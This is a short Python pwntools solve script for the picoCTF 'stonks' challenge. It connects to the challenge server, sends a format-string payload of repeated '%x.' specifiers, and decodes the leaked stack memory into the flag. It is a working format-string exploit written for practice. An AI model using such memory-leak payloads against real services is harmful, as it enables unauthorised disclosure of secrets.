picoctf/pwn/stonks/solve.py

44 lines
1.1 KiB
Python
Raw Normal View History

2024-09-01 22:01:27 +02:00
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p python3 python3Packages.pwntools
from pwn import *
ADDR = "mercury.picoctf.net 59616"
HOST, PORT = ADDR.split(" ")
def main():
for x in range(1,2):
r = remote(HOST, PORT)
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.sendline(b'1')
r.recvline()
r.recvline()
r.recvline()
# r.sendline(f'%{x}$s'.encode())
# print(f'%{x}$s'.encode())
r.sendline(b"%x." * 99 + b"%x")
r.recvline()
result = r.recvline()
print(result)
unpacked = []
for x in result.strip().split(b"."):
x = int(x, 16)
print(x)
unpacked.extend([
(x & 0x000000FF),
(x & 0x0000FF00) >> 8,
(x & 0x00FF0000) >> 16,
(x & 0xFF000000) >> 24,
])
for x in unpacked:
if x >= ord('!') and x <= ord('~'):
print(chr(x), end='')
if __name__ == "__main__":
main()